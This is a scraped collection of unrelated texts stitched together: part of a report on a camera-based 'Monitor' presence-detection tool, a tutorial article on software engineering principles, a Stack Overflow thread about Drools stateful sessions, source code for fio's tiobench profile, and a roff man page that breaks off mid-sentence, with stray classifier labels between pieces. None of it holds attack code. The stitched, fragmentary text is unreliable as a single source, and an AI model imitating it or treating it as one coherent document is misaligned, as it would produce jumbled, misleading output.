If this one is changed, then the quiet threshold must be retuned. A good procedure for setting the thresholds is the following. The first threshold that is to be set is the error one. In order to accommodate the hardware limitations, you grab several images from a very stable scene, and tune the error level so that the amount of changed pixels that is detected by the CmpFrames algorithm is lower than 2%. Than you grab images with a person in the scene who tries to move really little, and set the quiet threshold just under the average percentage of changes pixels that the algorithm detects. In the session that describes the Monitor program this procedure will be explained in more details. The Complexity of the Algorithm The proposed algorithm has a linear complexity. It scans the two images two times. During the first scan it smooth the image with a proper convolution mask and meanwhile computes the maximum gray level for each of the two images. Then during the second scan it computes the percentage of pixels that are different and compares it with the quiet threshold. It can be improved by storing the maximum gray level of the second image so that we don't need to recompute it at the next comparison. In this way one of the scanning can be saved. Technical Details The CmpFrames algorithm is actually implemented by an ANSI C function called CmpFrames() that is defined in the source file chkact.c of the distribution package. This source file depends only on the include file chkact.h, and can be linked with any program that needs to detect activity presence by comparing environment images. The CmpFrames() function assumes that the images are stored in memory as two dynamic bi-dimensional arrays of unsigned chars, one pixel per char. These kind of arrays are defined as a pointer to an array of pointers to unsigned chars (that is, typedef unsigned char **frame), and can be easily handled using the functions defined in the source file array.c. However, the chkact.c source is completely independent from the array.c source. In the current version of the CmpFrames() function the smooth process is not performed. It is assumed to be performed by the calling code. Finally, if requested the function can store in a third array an image in which the pixels that have been considered changed are set to black whilst all the other are set to white. This image can be useful for testing and fine-tuning purposes. The Fcmp Tool In order to provide a user level access to the CmpFrames() function, a program called Fcmp has been written. It uses the CmpFrames() function for comparing images stored on disk in the PGM format (see the public domain PbmPlus package). It mainly parses the command line for arguments, reads and stores the images in memory, and calls the CmpFrames() function. If requested (by option -d), the program stores in a file a PBM image in which the black pixels denote the pixels that have been considered different by the CmpFrames() function, whilst the white pixels denote areas in which no changes have been detected. Note that the program does not run the convolution mask on the images. This filtering operation can be easily accomplished at the user level by running the pnmsmooth program, contained in the PbmPlus package, on the images before calling the Fcmp program. The syntax is as follows. Usage: fcmp frame1 frame2 [-e error_level][-q quiet_level][-d diffFile][-s][-v] Exit status: This program can be compiled with an ANSI C compiler, like the gcc compiler. The Monitor Program The Monitor program is a personal notification tool that exploits the CmpFrames software module in order to provide notifications of events concerning people's availability. The tool is intended to be easy to use, and does not require specific skills. It provides an alert (a sound and text event description) as soon as the monitored person arrives to or leaves his or her workplace. If X Windows is available, you can also ask Monitor to output in a window the grabbed frames, one after the other, or to display the two frames of the last comparison together with the frames with the changed-pixels (see the Fcmp program). These graphic outputs can be useful for testing the program: with a quick glance you can easily tell if the program has made a good guess. Moreover, the changed-pixels frame can be very effective for checking if the noise generated by the hardware is properly reduced. Monitor can also work in a silent way, providing only return codes that can be used by other shell script and/or commands for further processing. This working modality can be used for building other personal tools on top of the Monitor program. In the package are included two examples of this kind of personal tools: Areyouthere detects if the person is there or not, whilst Whenarrives returns only when the person has returned or if activity is detected. These programs are very simple shell scripts that exploit the silent facility provided by Monitor. The main difference between using these programs and using directly the Monitor program is that Areyouthere and Whenarrives abort once they can provide the notifications, whilst the Monitor program can be run for continous monitoring purposes. Originally, one of the main purposes of the Monitor program was to allow an easy testing of the Fcmp software module before integrating it in the Portholes system, but it turned out that it can be used as a useful standalone tool completely independent from the Portholes system. Monitor relies on the iiif server for connecting users' cameras to a centralized frame grabber. By means of this interaction with the iiif server, the program is able to detect specific conditions related to the state of the person's Telepresence Stack. This possibility enhance the set of the possible notifications that the program can issue. Event and Status Notifications A notification is a message that is delivered to the user who has executed the program. Generally, a notification is issued when a related condition is recognized. Notifications are always time-stamped, but the time-stamp must not be considered the exact moment in which the condition arose, but rather the moment in which the program has been able to detect that condition. This is due to the fact that Monitor polls for conditions. Monitor can provide two main kinds of notifications. The status notifications can be considered the recognition of a state (and not of a change of state). These notifications are issued when there is the lack of memory on a previous state. For instance, when the program is executed for monitoring John, and John is in his office, the program reports a status of activity detected. Clearly, this is not an event. As soon as a change of state in the scene is detected, an event notifications is issued: John has arrived, or John has closed his door, or John has logged out. The following is a comprehensive list of all the categories of notifications that Monitor can issue. EVENT) A change of state has been detected (person has arrived or has left, has closed or opened his or her door, has logged in or out from the iiif server) STATUS) A status is reported only when the available information is not enough to detect any change of state (for instance, at the beginning of an execution the first two frames are enough to say if there is or not activity, but not for detecting a change of state since we do not have background information yet) DEBUG) Debug warnings issued only if option -d is indicated on the command line ERROR) An error condition occurred. The program aborts How it Works Monitor is a shell script that uses the Fcmp program for comparing the frames. Basically, monitor periodically ask the iiif server to connect the person's or node's camera to the frame-grabber, and uses the grab program for grabbing images (more later about the grab program). Once a frame has been grabbed, Monitor cleans it using the PbmPlus tool pnmconvol. Then, if a previous frame is available, Monitor calls the Fcmp program described in the previous section. Fcmp performs the comparison between the two frames and detects if there is activity. Monitor uses this information and compares it with the previous result, if any, in order to guess what happened on the scene. Because of the way the absence of activity is detected by the Fcmp program (that is, we have no activity when two sequential frames are very similar one to the next), it turns out that the Monitor program is late of one frame in detecting when the person has left (think about it). Anyway, this is not a big problem since the most used feature should be the notification of people's arrival. Installation The package contains the following files: README A readme file doc The directory containing documentation files, like monitor.mcw A MacWord version of this report monitor.rtf A RTF version of this report monitor.txt An ASCI version of this report monitor.ps A Postscript version of this document fcmp Compares two frames and detects activity (to be manually compiled on a different architecture) grab Grabs a frame from the local frame-grabber (to be manually compiled on a different architecture) monitor The Monitor tool areyouthere The Areyouthere tool whenarrives The Whenarrives tool pnmconvol The PbmPlus program for applying convolution filtering to frames pnmcat The PbmPlus program for merging different frames in one pnmscale The PbmPlus program for scaling frames fcmp_src The directory containing the sources for the fcmp program grab_src The directory containing the sources for the grab program In order to install the tool, you need a SunOS 4.1.3 1 compatible workstation, at the binary level. Once you have untared the package, you might want to edit the header of the shell script 'monitor' and change the default configuration. If you already have an iiif client program, all you have to do is to compile the fcmp program, if the workstation is different from the one mentioned. The sources and the Makefile of the fcmp program are stored in the fcmp-src directory. If you do not have an iiif client program then you have to look for it. As regards the grab program for controlling the frame-grabber, the binary version (grab) is provided with the source code (grab.c) and Makefile. To summarize:
__label__pos
0.741377
• Articles • Tutorials • Interview Questions Basic Principles of Software Engineering Software engineering is a vital discipline centered around designing, developing, testing, and maintaining software systems. With constant advancements, it is a complex and dynamic field. Successful software engineering projects rely on adhering to fundamental principles to ensure the reliability, efficiency, and maintainability of software. Know the whole process to become a Software Engineer through this video: What is Software Engineering? The process of designing, developing, testing, and maintaining software systems through a structured and systematic approach encompasses the profile of a software engineer. It entails the application of engineering principles and methods for the development of software by emphasizing the creation of software systems that are reliable, scalable, and of high quality. Software engineering encompasses various activities, such as analyzing requirements, designing software, writing code, conducting tests, and performing maintenance. Software engineering is a complex and difficult field, with many different aspects affecting whether a software project is successful or not. The complexity of the software system, the skill and experience of the development team, the availability of resources, and the specific requirements of the organization or industry in issue are among these considerations.  Also, check out user acceptance testing blog. Why are Software Engineering Principles Important? Developing robust, maintainable software solutions necessitates the incorporation of essential software engineering principles. Adhering to these principles guarantees accurate, efficient, and cost-effective development of the software. Enumerated below are several key justifications for the significance of software engineering principles: • Reliability and Correctness – Software engineering principles emphasize techniques that reduce the number of defects and bugs in the software. Principles like modularization, top-down design, and stepwise refinement break complex systems into manageable parts that are easier to verify for correctness. Furthermore, strategies like unit testing, code reviews, and walkthroughs detect errors early in the development process. This results in a more reliable software that behaves as intended. • Manageability of Complexity– Large software systems can be extremely complex, with thousands of interacting components. Software engineering principles promote ways to organize this complexity, for example, through abstraction, encapsulation, and modularity. This makes the system easier to comprehend, navigate, and change over time. Without such principles in place, managing complex software would be literally impossible. • Maintainability and Extensibility – Software engineering principles facilitate the maintenance and evolution of software systems. Principles like information hiding, separation of concerns, and layering partition the software into smaller logical pieces that can be modified independently. Conventions like naming standards and documentation procedures also aid in maintainability. This makes the software adaptable to the ongoing changes in requirements and technology. • Productivity and Cost – Well-engineered software that follows basic principles tends to be less expensive to develop, test, and maintain in the long run. Good design techniques minimize the rework and duplication of effort. Issues are caught and fixed earlier in the development lifecycle to avoid costly defects in later stages. In total, productivity is increased and development costs are reduced through the proper application of software engineering principles. Check out our Full Stack Developer Course to get certified and become a developer. Principles of Software Engineering Principles of Software Engineering The following are the guidelines and strategies we need to follow to remain rational and to make technical decisions that are appropriate, given the needs, budget, timeframe, and expectations. Following these guidelines will aid in the smooth progression of your project. • KISS (Keep It Simple, Stupid) The KISS principle promotes software simplicity by focusing on avoiding pointless complexity and giving priority to crucial features and functionalities. Developers can reduce the likelihood of errors and flaws while simplifying simple maintenance and upgrades by following this approach. • DRY (Don’t Repeat Yourself) Code repetition that is not necessary should be avoided as recommended by the DRY philosophy. It highlights the value of code reuse and encourages developers to use pre-existing code rather than duplicating it throughout various software system components. Following this rule reduces the possibility of mistakes and defects while also making the maintenance and update processes easier. • YAGNI (You Aren’t Gonna Need It) The YAGNI principle highlights the significance of simply implementing the essential features during software development as opposed to making an effort to foresee and include every potential feature that might be required in the future. Developers can not only reduce needless complexity but also minimize possibilities of mistakes and flaws by abiding by this guideline. • BDUF (Big Design Upfront) The BDUF principle states that software systems should be designed as completely as possible before any coding begins. While this approach can be useful in some cases, it can also lead to unnecessary complexity and a lack of flexibility. Instead, many developers prefer an iterative approach, where the design evolves over time as the software is developed and tested. • SOLID SOLID is an acronym that stands for the five principles of object-oriented design: Single Responsibility Principle, Open/Closed Principle, Liskov Substitution Principle, Interface Segregation Principle, and Dependency Inversion Principle. These principles help developers create software systems that are modular, flexible, and maintainable. • Occam’s Razor Occam’s Razor states that all things being equal, the simplest solution is usually the best. This principle encourages developers to avoid unnecessary complexity and to focus on the most straightforward and effective solution to a given problem. • Law of Demeter (LoD) The Law of Demeter, also known as the principle of least knowledge, states that software components should only interact with a limited number of other components. This helps reduce the complexity of the software system and makes it easier to maintain and update. • Avoid Premature Optimization Premature optimization refers to the practice of optimizing the software before it is necessary to do so. This can lead to unnecessary complexity and a lack of flexibility. Instead, developers should focus on creating software that meets the needs of users and stakeholders, and optimize it only when necessary. • Measure Twice and Cut Once Before starting the coding process, this notion urges engineers to take their time to carefully plan and build software systems. By doing this, programmers may steer clear of expensive errors and guarantee that the software system satisfies the requirements of users and stakeholders. • Principle of Least Astonishment Software systems should act in a way that is consistent with what the users and stakeholders expect, according to the Principle of Least Astonishment. This lowers the possibility of errors and malfunctions while also increasing customer happiness. Get 100% Hike! Master Most in Demand Skills Now ! Know things which you should know about web development through our Web Development Tutorial. Best Practices for Software Engineering Best Practices for Software Engineering Software engineering follows a set of advised practices to guarantee the best results. These practices include actions like gathering and analyzing requirements, implementing agile development methodologies, version control, thorough testing, process documentation, code reviews, facilitating continuous integration and deployment, giving security a top priority, enhancing performance, and fostering a culture of ongoing learning and improvement. Developers can build software systems that are dependable, effective, maintainable, and in line with the user and stakeholder expectations by embracing these best practices. In order to ensure the success of software development projects, software engineering encompasses numerous best practices, including the following: • Requirements Gathering and Analysis – It is essential to acquire and comprehend the system’s requirements before beginning a software development project. This requires engaging in active dialogue with stakeholders, understanding their needs and expectations thoroughly, and then translating those needs into specific, well-defined software requirements. • Agile Development Agile development is a method of creating software that puts an emphasis on flexibility, teamwork, and responsiveness to change. It focuses on working in brief iterations, regularly testing and improving the software, and adapting to changing needs and stakeholder feedback. Increased flexibility is possible because of this iterative approach, which also makes sure that the software satisfies the project’s changing requirements. • Version Control – Version control is a system for managing the changes to the software code. It allows developers to track changes, collaborate on code changes, and revert to previous versions of the code if necessary. Some popular version control systems include Git and SVN. • Testing – Testing holds a pivotal position within the software development process, serving as a crucial element. Its main purpose involves validating whether the software system adheres to the specified requirements and specifications while identifying and resolving any flaws or defects. A diverse array of testing methods are available, including unit testing, integration testing, and acceptance testing, among others. • Documentation – Documentation is critical in guaranteeing the maintainability and comprehension of the software systems by others. Developers should meticulously document their code and system design, as well as provide user manuals and other types of documentation, to help users understand the system’s operation and usage. • Code Reviews – Code reviews involve having other developers review the code changes before they are merged into the main codebase. This can help identify and fix errors or issues before they become more serious problems. Code reviews also help ensure that the code is maintainable, readable and that it adheres to best practices. • Continuous Integration and Deployment – Continuous integration and deployment involve automating the process of building, testing, and deploying software systems. This helps ensure that the changes to the system are quickly and consistently integrated into the main codebase and that the system is always in a deployable state. • Security – With regard to software engineering, security is really important. When it comes to protecting software systems, developers must follow industry best practices. This entails implementing dependable safeguards like encryption, authentication, and access control, as well as regularly conducting vulnerability assessments and testing. • Performance Tuning – The process of improving the functionality and performance of software systems is known as performance tuning. It comprises the ongoing monitoring and analysis of system performance, which results in the necessary code or infrastructure optimizations to improve the overall performance. To obtain ideal performance levels, developers must carefully evaluate the system and make necessary modifications. Prepare all the questions which are asked in a Software Engineering Interview through Software Engineering Interview Questions and Answers. Conclusion Developers play a crucial role in the success of software development projects as they adhere to essential software engineering principles such as KISS, DRY, YAGNI, SOLID, and Occam’s Razor. These principles empower developers to build dependable, efficient, and manageable software systems that fulfill user and stakeholder requirements, all while effectively handling complexity, improving quality, and mitigating risks. By actively collaborating with the development team, software engineers can create influential software systems that foster innovation and enhance efficiency. Through the field of software engineering, individuals have the opportunity to make a significant impact by creating new technologies, solving intricate problems, and driving progress across various industries. Also, read on about different types of software testing. Course Schedule Name Date Details Web Development Courses 20 Apr 2024(Sat-Sun) Weekend Batch View Details Web Development Courses 27 Apr 2024(Sat-Sun) Weekend Batch View Details Web Development Courses 04 May 2024(Sat-Sun) Weekend Batch View Details
__label__pos
0.941216
Take the 2-minute tour × Stack Overflow is a question and answer site for professional and enthusiast programmers. It's 100% free, no registration required. (I am a bit new to working with Drools, so please excuse if this is a simple question). I would like to use Drools for reactive execution of rules, this means we could consider the “facts” being inserted to be “event” instances. However, I want this to execute in a way that rules can be fired as soon as events are received. But, in the case that a rule may depend on several events, how can I configure the Working Memory, to remember previous events. Consider a very simple example: Say I have the following rules: - when (E1) do A1 - when (E2) do A2 - when (E1,E2) do A3 Then, if time progresses as follows, I want to following rules to be fired, example: - t=1 , E1 happens => A1 fired - t=2 , E2 happens => A2 fired + A3 fired The problem I have is if I call ksession.fireAllRules() after every insertion, the working memory will forget all previous events. What is the best way to achieve what I want? share|improve this question 1 Answer 1 up vote 0 down vote accepted as long as you use a Stateful Knowledge Session, what you are probably doing because the stateless one has no fireAllRules() method, the WM will not forget all the inserted facts. What you express as "E1 happens" should be ksession.insert(E1); You may play with the example given in the documentation (link above)... share|improve this answer      Thanks pgras, I’ve fixed my code now. Although I am trying to understand now, how does the rule engine know not to re-fire the rules that it already matched? Since the facts remain in WM. If this happens to be explained in any docs, would be helpful to read... –  Larry Jan 17 '13 at 18:50      Yes, that's explained in the docs. The rules are activated by the set of facts, when a set of facts that matches with the rule condition are inserted the activation is created and then fired (on the fireAllRules()). After that, if you modify one of your facts and notify the engine (ksession.modify/update) the activation will be recreated and the rule can be re fired. If you don't change your fact the rule will be activated and fired just once for that combination of facts. –  salaboy Jan 18 '13 at 9:05 Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.697727
`SBUBaseChannelViewController` bug when calling `loadChannel(channelUrl:messageListParams:)` When SBUBaseChannelViewController is initialized with a certain channel ID and then loads a different channel by calling loadChannel(channelUrl:messageListParams:), the channelUrl property is not updated. This results in a bug where the pending message doesn’t get removed. The code proceeds as follows: 1. SBUPendingMessageManager.shared.upsertPendingMessage is called with baseChannel.channelUrl 1. Subsequent calls to SBUPendingMessageManager are called with channelUrl. I confirmed that the first insert to SBUBaseChannelViewController.pendingMessages is called with the correct channel ID whereas later calls for the pending status and success status are called with the initial channel ID. Please let me know when this gets fixed. I was able to confirm that things work as they should when calling viewController.setValue(id, forKey: "channelUrl") in conjunction with loadChannel Wondering if anyone has looked into this issue… :roll_eyes: Hi @GoGo7 Sorry for too late checking your problem. ChannelViewController was not originally designed to change channels internally. But through the loadChannel function, it should be able to the process you want. And thanks to your information I found a problem that the logic of not updating the channelURL. I will fix this problem in the new version. However, the regular distribution schedule is in two weeks. Can you wait for the distribution? 1 Like Sounds good. Thank you. @GoGo7 Regarding this issue, iOS released version 2.2.6 yesterday (Mar, 28th)
__label__pos
0.930456
Split mutex.c and .h each into three files [fio.git] / profiles / tiobench.c CommitLineData 79d16311 JA 1#include "../fio.h" 2#include "../profile.h" e2de69da 3#include "../parse.h" d220c761 4#include "../optgroup.h" e2de69da 5 2363d8df JA 6static unsigned long long size; 7static unsigned int loops = 1; 8static unsigned int bs = 4096; 9static unsigned int nthreads = 1; e2de69da 10static char *dir; 79d16311 11 10aa136b 12static char sz_idx[80], bs_idx[80], loop_idx[80], dir_idx[80], t_idx[80]; 2363d8df 13 79d16311 14static const char *tb_opts[] = { 2363d8df JA 15 "buffered=0", sz_idx, bs_idx, loop_idx, dir_idx, t_idx, 16 "timeout=600", "group_reporting", "thread", "overwrite=1", 79d16311 17 "filename=.fio.tio.1:.fio.tio.2:.fio.tio.3:.fio.tio.4", 774a99b5 18 "ioengine=sync", 79d16311 JA 19 "name=seqwrite", "rw=write", "end_fsync=1", 20 "name=randwrite", "stonewall", "rw=randwrite", "end_fsync=1", 21 "name=seqread", "stonewall", "rw=read", 22 "name=randread", "stonewall", "rw=randread", NULL, 23}; 24 7b504edd JA 25struct tiobench_options { 26 unsigned int pad; 27 unsigned long long size; 28 unsigned int loops; 29 unsigned int bs; 30 unsigned int nthreads; 31 char *dir; 32}; 33 34static struct tiobench_options tiobench_options; 35 e2de69da JA 36static struct fio_option options[] = { 37 { 38 .name = "size", e8b0e958 39 .lname = "Tiobench size", 2363d8df 40 .type = FIO_OPT_STR_VAL, 7b504edd 41 .off1 = offsetof(struct tiobench_options, size), 4870138d 42 .help = "Size in MiB", 13fca827 JA 43 .category = FIO_OPT_C_PROFILE, 44 .group = FIO_OPT_G_TIOBENCH, e2de69da JA 45 }, 46 { 47 .name = "block", e8b0e958 48 .lname = "Tiobench block", e2de69da 49 .type = FIO_OPT_INT, 7b504edd 50 .off1 = offsetof(struct tiobench_options, bs), e2de69da 51 .help = "Block size in bytes", 2b9136a3 52 .def = "4096", 13fca827 JA 53 .category = FIO_OPT_C_PROFILE, 54 .group = FIO_OPT_G_TIOBENCH, e2de69da JA 55 }, 56 { 57 .name = "numruns", e8b0e958 58 .lname = "Tiobench numruns", e2de69da 59 .type = FIO_OPT_INT, 7b504edd 60 .off1 = offsetof(struct tiobench_options, loops), e2de69da 61 .help = "Number of runs", 13fca827 JA 62 .category = FIO_OPT_C_PROFILE, 63 .group = FIO_OPT_G_TIOBENCH, e2de69da JA 64 }, 65 { 66 .name = "dir", e8b0e958 67 .lname = "Tiobench directory", e2de69da 68 .type = FIO_OPT_STR_STORE, 7b504edd 69 .off1 = offsetof(struct tiobench_options, dir), e2de69da 70 .help = "Test directory", 13fca827 JA 71 .category = FIO_OPT_C_PROFILE, 72 .group = FIO_OPT_G_TIOBENCH, 43f466e6 73 .no_free = true, e2de69da 74 }, 2363d8df JA 75 { 76 .name = "threads", e8b0e958 77 .lname = "Tiobench threads", 2363d8df 78 .type = FIO_OPT_INT, 7b504edd 79 .off1 = offsetof(struct tiobench_options, nthreads), 2363d8df 80 .help = "Number of Threads", 13fca827 JA 81 .category = FIO_OPT_C_PROFILE, 82 .group = FIO_OPT_G_TIOBENCH, 2363d8df 83 }, e2de69da JA 84 { 85 .name = NULL, 86 }, 87}; 88 2363d8df JA 89/* 90 * Fill our private options into the command line 91 */ d4afedfd 92static int tb_prep_cmdline(void) 2363d8df 93{ 2363d8df 94 /* 4870138d 95 * tiobench uses size as MiB, so multiply up 2363d8df JA 96 */ 97 size *= 1024 * 1024ULL; 98 if (size) 99 sprintf(sz_idx, "size=%llu", size); 100 else 101 strcpy(sz_idx, "size=4*1024*$mb_memory"); 102 103 sprintf(bs_idx, "bs=%u", bs); 104 sprintf(loop_idx, "loops=%u", loops); 105 106 if (dir) 107 sprintf(dir_idx, "directory=%s", dir); 108 else 109 sprintf(dir_idx, "directory=./"); 110 111 sprintf(t_idx, "numjobs=%u", nthreads); d4afedfd 112 return 0; 2363d8df JA 113} 114 79d16311 JA 115static struct profile_ops tiobench_profile = { 116 .name = "tiobench", f5b6bb85 117 .desc = "tiotest/tiobench benchmark", 2363d8df JA 118 .prep_cmd = tb_prep_cmdline, 119 .cmdline = tb_opts, 7b504edd JA 120 .options = options, 121 .opt_data = &tiobench_options, 79d16311 JA 122}; 123 124static void fio_init tiobench_register(void) 125{ 07b3232d JA 126 if (register_profile(&tiobench_profile)) 127 log_err("fio: failed to register profile 'tiobench'\n"); 79d16311 JA 128} 129 130static void fio_exit tiobench_unregister(void) 131{ 132 unregister_profile(&tiobench_profile); 133}
__label__pos
0.992273
Linux Blog ROFF Section: Environments, Tables, and Troff Macros (7) Updated: 3 June 2004 Index Return to Main Contents   NAME roff - concepts and history of roff typesetting   DESCRIPTION roff is the general name for a set of type-setting programs, known under names like troff, nroff, ditroff, groff, etc. A roff type-setting system consists of an extensible text formatting language and a set of programs for printing and converting to other text formats. Traditionally, it is the main text processing system of Unix; every Unix-like operating system still distributes a roff system as a core package. The most common roff system today is the free software implementation GNU roff, groff(1). The pre-groff implementations are referred to as classical (dating back as long as 1973). groff implements the look-and-feel and functionality of its classical ancestors, but has many extensions. As groff is the only roff system that is available for every (or almost every) computer system it is the de-facto roff standard today. In some ancient Unix systems, there was a binary called roff that implemented the even more ancient runoff of the Multics operating system, cf. section HISTORY. The functionality of this program was very restricted even in comparison to ancient troff; it is not supported any longer. Consequently, in this document, the term roff always refers to the general meaning of roff system, not to the ancient roff binary. In spite of its age, roff is in wide use today, for example, the manual pages on UNIX systems (man~pages/), many software books, system documentation, standards, and corporate documents are written in roff. The roff output for text devices is still unmatched, and its graphical output has the same quality as other free type-setting programs and is better than some of the commercial systems. The most popular application of roff is the concept of manual pages or shortly man pages; this is the standard documentation system on many operating systems. This document describes the historical facts around the development of the roff system; some usage aspects common to all roff versions, details on the roff pipeline, which is usually hidden behind front-ends like groff(1); an general overview of the formatting language; some tips for editing roff files; and many pointers to further readings.   HISTORY The roff text processing system has a very long history, dating back to the 1960s. The roff system itself is intimately connected to the Unix operating system, but its roots go back to the earlier operating systems CTSS and Multics.   The Predecessor runoff The evolution of roff is intimately related to the history of the operating systems. Its predecessor runoff was written by Jerry Saltzer on the CTSS operating system (Compatible Time Sharing System) as early as 1961. When CTSS was further developed into the operating system the famous predecessor of Unix from 1963, runoff became the main format for documentation and text processing. Both operating systems could only be run on very expensive computers at that time, so they were mostly used in research and for official and military tasks. The possibilities of the runoff language were quite limited as compared to modern roff. Only text output was possible in the 1960s. This could be implemented by a set of requests of length~2, many of which are still identically used in roff. The language was modelled according to the habits of typesetting in the pre-computer age, where lines starting with a dot were used in manuscripts to denote formatting requests to the person who would perform the typesetting manually later on. The runoff program was written in the PL/1 language first, later on in BCPL, the grandmother of the C~ programming language. In the Multics operating system, the help system was handled by runoff, similar to roff's task to manage the Unix manual pages. There are still documents written in the runoff language; for examples see Saltzer's home page, cf. section SEE ALSO.   The Classical nroff/troff System In the 1970s, the Multics off-spring Unix became more and more popular because it could be run on affordable machines and was easily available for universities at that time. At MIT (the Massachusetts Institute of Technology), there was a need to drive the Wang Graphic Systems CAT typesetter, a graphical output device from a PDP-11 computer running Unix. As runoff was too limited for this task it was further developed into a more powerful text formatting system by Josef F. Osanna, a main developer of the Multics operating system and programmer of several runoff ports. The name runoff was shortened to roff. The greatly enlarged language of Osanna's concept included already all elements of a full roff system. All modern roff systems try to implement compatibility to this system. So Joe Osanna can be called the father of all roff systems. This first roff system had three formatter programs. troff (typesetter roff/) generated a graphical output for the CAT typesetter as its only device. nroff produced text output suitable for terminals and line printers. roff was the reimplementation of the former runoff program with its limited features; this program was abandoned in later versions. Today, the name roff is used to refer to a troff/:nroff sytem as a whole. Osanna first version was written in the PDP-11 assembly language and released in 1973. Brian Kernighan joined the roff development by rewriting it in the C~programming language. The C~version was released in 1975. The syntax of the formatting language of the nroff/troff programs was documented in the famous Troff User's Manual [CSTR~#54], first published in 1976, with further revisions up to 1992 by Brian Kernighan. This document is the specification of the classical troff. All later roff systems tried to establish compatibility with this specification. After Osanna had died in 1977 by a heart-attack at the age of about~50, Kernighan went on with developing troff. The next milestone was to equip troff with a general interface to support more devices, the intermediate output format and the postprocessor system. This completed the structure of a roff system as it is still in use today; see section USING ROFF. In 1979, these novelties were described in the paper [CSTR~#97]. This new troff version is the basis for all existing newer troff systems, including groff. On some systems, this device independent troff got a binary of its own, called ditroff(7). All modern troff programs already provide the full ditroff capabilities automatically.   Commercialization A major degradation occurred when the easily available Unix~7 operating system was commercialized. A whole bunch of divergent operating systems emerged, fighting each other with incompatibilities in their extensions. Luckily, the incompatibilities did not fight the original troff. All of the different commercial roff systems made heavy use of Osanna/:Kernighan's open source code and documentation, but sold them as [lq]their[rq] system [em] with only minor additions. The source code of both the ancient Unix and classical troff weren't available for two decades. Fortunately, Caldera bought SCO UNIX in 2001. In the following, Caldera made the ancient source code accessible on-line for non-commercial use, cf. section SEE ALSO.   Free roff None of the commercial roff systems could attain the status of a successor for the general roff development. Everyone was only interested in their own stuff. This led to a steep downfall of the once excellent Unix operating system during the 1980s. As a counter-measure to the galopping commercialization, AT&T Bell Labs tried to launch a rescue project with their Plan~9 operating system. It is freely available for non-commercial use, even the source code, but has a proprietary license that impedes the free development. This concept is outdated, so Plan~9 was not accepted as a platform to bundle the main-stream development. The only remedy came from the emerging free operatings systems (386BSD, GNU/:Linux, etc.) and software projects during the 1980s and 1990s. These implemented the ancient Unix features and many extensions, such that the old experience is not lost. In the 21st century, Unix-like systems are again a major factor in computer industry [em] thanks to free software. The most important free roff project was the GNU port of troff, created by James Clark and put under the It was called groff (GNU roff). See groff(1) for an overview. The groff system is still actively developed. It is compatible to the classical troff, but many extensions were added. It is the first roff system that is available on almost all operating systems [em] and it is free. This makes groff the de-facto roff standard today.   USING ROFF Most people won't even notice that they are actually using roff. When you read a system manual page (man page) roff is working in the background. Roff documents can be viewed with a native viewer called xditview(1x), a standard program of the X window distribution, see X(7x). But using roff explicitly isn't difficult either. Some roff implementations provide wrapper programs that make it easy to use the roff system on the shell command line. For example, the GNU roff implementation groff(1) provides command line options to avoid the long command pipes of classical troff; a program grog(1) tries to guess from the document which arguments should be used for a run of groff; people who do not like specifying command line options should try the groffer(1) program for graphically displaying groff files and man pages.   The roff Pipe Each roff system consists of preprocessors, roff formatter programs, and a set of device postprocessors. This concept makes heavy use of the piping mechanism, that is, a series of programs is called one after the other, where the output of each program in the queue is taken as the input for the next program.   ellCommand @1] @2] @3] The preprocessors generate roff code that is fed into a roff formatter (e.g. troff), which in turn generates intermediate output that is fed into a device postprocessor program for printing or final output. All of these parts use programming languages of their own; each language is totally unrelated to the other parts. Moreover, roff macro packages that were tailored for special purposes can be included. Most roff documents use the macros of some package, intermixed with code for one or more preprocessors, spiced with some elements from the plain roff language. The full power of the roff formatting language is seldom needed by users; only programmers of macro packages need to know about the gory details.   Preprocessors A roff preprocessor is any program that generates output that syntactically obeys the rules of the roff formatting language. Each preprocessor defines a language of its own that is translated into roff code when run through the preprocessor program. Parts written in these languages may be included within a roff document; they are identified by special roff requests or macros. Each document that is enhanced by preprocessor code must be run through all corresponding preprocessors before it is fed into the actual roff formatter program, for the formatter just ignores all alien code. The preprocessor programs extract and transform only the document parts that are determined for them. There are a lot of free and commercial roff preprocessors. Some of them aren't available on each system, but there is a small set of preprocessors that are considered as an integral part of each roff system. The classical preprocessors are tbl for tables eqn for mathematical formul[ae] pic for drawing diagrams refer for bibliographic references soelim for including macro files from standard locations Other known preprocessors that are not available on all systems include chem for drawing chemical formul[ae]. grap for constructing graphical elements. grn for including gremlin(1) pictures.   Formatter Programs A roff formatter is a program that parses documents written in the roff formatting language or uses some of the roff macro packages. It generates intermediate output, which is intended to be fed into a single device postprocessor that must be specified by a command-line option to the formatter program. The documents must have been run through all necessary preprocessors before. The output produced by a roff formatter is represented in yet another language, the intermediate output format or troff output. This language was first specified in [CSTR~#97]; its GNU extension is documented in groff_out(5). The intermediate output language is a kind of assembly language compared to the high-level roff language. The generated intermediate output is optimized for a special device, but the language is the same for every device. The roff formatter is the heart of the roff system. The traditional roff had two formatters, nroff for text devices and troff for graphical devices. Often, the name troff is used as a general term to refer to both formatters.   Devices and Postprocessors Devices are hardware interfaces like printers, text or graphical terminals, etc., or software interfaces such as a conversion into a different text or graphical format. A roff postprocessor is a program that transforms troff output into a form suitable for a special device. The roff postprocessors are like device drivers for the output target. For each device there is a postprocessor program that fits the device optimally. The postprocessor parses the generated intermediate output and generates device-specific code that is sent directly to the device. The names of the devices and the postprocessor programs are not fixed because they greatly depend on the software and hardware abilities of the actual computer. For example, the classical devices mentioned in [CSTR~#54] have greatly changed since the classical times. The old hardware doesn't exist any longer and the old graphical conversions were quite imprecise when compared to their modern counterparts. For example, the Postscript device post in classical troff had a resolution of 720, while groff's ps device has 72000, a refinement of factor 100. Today the operating systems provide device drivers for most printer-like hardware, so it isn't necessary to write a special hardware postprocessor for each printer.   ROFF PROGRAMMING Documents using roff are normal text files decorated by roff formatting elements. The roff formatting language is quite powerful; it is almost a full programming language and provides elements to enlarge the language. With these, it became possible to develop macro packages that are tailored for special applications. Such macro packages are much handier than plain roff. So most people will choose a macro package without worrying about the internals of the roff language.   Macro Packages Macro packages are collections of macros that are suitable to format a special kind of documents in a convenient way. This greatly eases the usage of roff. The macro definitions of a package are kept in a file called name.tmac (classically tmac.name ). All tmac files are stored in one or more directories at standardized positions. Details on the naming of macro packages and their placement is found in groff_tmac(5). A macro package that is to be used in a document can be announced to the formatter by the command line option   ortOpt m see troff(1), or it can be specified within a document using the file inclusion requests of the roff language, see groff(7). Famous classical macro packages are man for traditional man pages, mdoc for BSD-style manual pages; the macro sets for books, articles, and letters are me (probably from the first name of its creator 